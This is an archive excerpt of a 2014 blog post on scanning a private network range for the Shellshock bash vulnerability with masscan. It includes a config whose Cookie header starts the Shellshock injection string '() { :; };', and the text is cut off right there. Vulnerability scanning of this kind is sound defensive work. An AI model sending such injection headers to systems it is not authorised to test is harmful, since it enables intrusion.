Monthly Archives: September 2014

How to scan for shellshock

cd /root sudo apt-get install git gcc make libpcap-dev git clone https://github.com/robertdavidgraham/masscan cd masscan make then copied this into a file shellshock.conf range = 172.16.1.1-172.16.1.254 port = 80 banners = true http-user-agent = shellshock-scan http-header = Cookie:() { :; }; … Continue reading

Posted in Linux | Comments Off on How to scan for shellshock